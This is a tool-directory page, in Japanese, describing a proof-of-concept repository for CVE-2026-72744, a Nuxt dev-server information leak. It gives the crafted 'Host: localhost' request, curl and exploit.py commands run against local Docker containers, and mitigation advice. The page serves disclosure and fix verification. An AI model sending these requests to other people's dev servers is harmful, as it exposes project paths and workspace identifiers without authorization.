Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-72744-poc — Proof-of-concept exploit for CVE-2026-72744, an information disclosure vulnerability in Nuxt dev server's Chrome DevTools workspace endpoint. Demonstrates the flaw and verifies the fix. | Kitploit
ツール/GitHubGitHub/saku0512/cve-2026-72744-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchLearning & Education
GitHubsaku0512/cve-2026-72744-poc

CVE-2026-72744-poc

Proof-of-concept exploit for CVE-2026-72744, an information disclosure vulnerability in Nuxt dev server's Chrome DevTools workspace endpoint. Demonstrates the flaw and verifies the fix.

リポジトリを見る
5時間18分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-72744: Nuxt Chrome DevTools エンドポイントの情報漏えい PoC

English version

概要

このリポジトリは、Nuxt 開発サーバーの Chrome DevTools workspace エンドポイントに存在する情報漏えい脆弱性 CVE-2026-72744 の Proof of Concept (PoC) です。

脆弱な開発サーバーは、接続元がローカルかどうかを TCP peer address ではなく、 攻撃者が指定できる Host などの HTTP ヘッダーで判定します。開発サーバーが 0.0.0.0 に bind されている場合、LAN 上の未認証攻撃者は Host: localhost を付けたリクエストにより、プロジェクトの絶対パスと永続的な workspace UUID を取得できます。

このPoCは、Nuxt 4.5.0(脆弱版)と4.5.1(修正版)をDockerで起動し、ホスト側 から同じリクエストを送って挙動の違いを確認します。ファイルの読み書きやコード 実行は行いません。

免責事項

教育目的および許可されたセキュリティ検証にのみ使用してください。第三者の環境へ 無断でリクエストを送信しないでください。

脆弱性の詳細

  • CVE ID: CVE-2026-72744
  • 製品: Nuxt
  • 種別: 情報漏えい (CWE-200)
  • 影響を受けるバージョン: >= 4.4.7, < 4.5.1 および
>= 3.21.7, < 3.21.10
  • 修正済みバージョン: 4.5.1 / 3.21.10
  • 対象: 開発サーバーのみ(production build は対象外)
  • 必要条件: ネットワーク到達可能な bind と、既定で有効な experimental.chromeDevtoolsProjectSettings
  • 影響: rootDir の絶対パスとプロジェクト固有 workspace UUID の漏えい
  • 根本原因

    脆弱版の isLocalDevRequest は、Host が許可リストに入り、ブラウザー由来の クロスサイトヘッダーがなければリクエストをローカルとして扱います。 非ブラウザークライアントはこれらのヘッダーを自由に省略・指定できるため、次の リクエストが検査を通過します。

    root@kitploit:~
    GET /.well-known/appspecific/com.chrome.devtools.json HTTP/1.1
    Host: localhost
    

    修正版は既存のヘッダー検査に加え、実際の TCP peer address が loopback (127.0.0.0/8 または ::1)であることを要求します。

    Proof of Concept(使用方法)

    1. 環境の起動

    root@kitploit:~
    docker compose up -d --build
    
    URLバージョン想定結果
    http://localhost:3000Nuxt 4.5.0HTTP 200、情報漏えい
    http://localhost:3001Nuxt 4.5.1HTTP 403

    初回ビルドでは npm パッケージを取得するため数分かかる場合があります。

    2. 脆弱版の検証

    root@kitploit:~
    python3 exploit.py -t http://localhost:3000 --expect vulnerable
    

    期待される出力:

    root@kitploit:~
    [!] VULNERABLE: the endpoint disclosed workspace.root and workspace.uuid.
    

    3. 修正版の検証

    root@kitploit:~
    python3 exploit.py -t http://localhost:3001 --expect fixed
    

    期待される出力:

    root@kitploit:~
    [+] FIXED: the non-loopback request was rejected with HTTP 403.
    

    4. curlでの確認

    root@kitploit:~
    curl -i -H 'Host: localhost' \
      http://localhost:3000/.well-known/appspecific/com.chrome.devtools.json
    
    curl -i -H 'Host: localhost' \
      http://localhost:3001/.well-known/appspecific/com.chrome.devtools.json
    

    Docker のポート転送を経由するため、コンテナから見た接続元は loopback では ありません。これにより単一ホスト上で LAN 攻撃相当の条件を再現できます。

    5. クリーンアップ

    root@kitploit:~
    docker compose down -v
    

    PoCの判定条件

    exploit.py は Host: localhost を指定し、Origin、Referer、 Sec-Fetch-Site を送らずに対象エンドポイントへアクセスします。HTTP 200 の JSONに文字列の workspace.root と workspace.uuid が含まれる場合のみ、脆弱と 判定します。HTTP 403 は修正済みの期待動作です。

    対策

    Nuxt 4系は 4.5.1以降、3系は 3.21.10以降へ更新してください。更新できない 場合は開発サーバーを loopback のみに bind するか、 experimental.chromeDevtoolsProjectSettings: false を設定してください。

    参考情報

    • GitHub Security Advisory GHSA-7c4v-fwgw-9rf7
    • Nuxt 4.5.1 release
    • Fix commit
    • NVD: CVE-2026-72744
    ツールをダウンロード